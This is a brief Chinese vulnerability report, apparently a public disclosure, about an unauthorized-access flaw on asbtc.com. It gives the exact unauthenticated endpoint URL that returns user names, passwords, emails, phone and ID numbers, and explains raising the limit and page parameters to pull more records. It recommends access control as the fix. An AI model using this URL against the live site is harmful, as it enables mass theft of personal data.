简要描述
存在未授权访问,直接访问用户所有信息
漏洞证明
https://www.asbtc.com//quenryClient/sys/getPageInfos.do?page=1&limit=100&email=&clientName=&tel=&status=&hz_key=
包含用户名,密码,邮箱,手机,身份证
拼接如:
https://www.asbtc.com//upload/153279326288***.jpg
控制显示长度只需调整limit和page参数如limit=200
https://www.asbtc.com//quenryClient/sys/getPageInfos.do?page=1&limit=200&email=&clientName=&tel=&status=&hz_key=
修复方案:
控制访问权限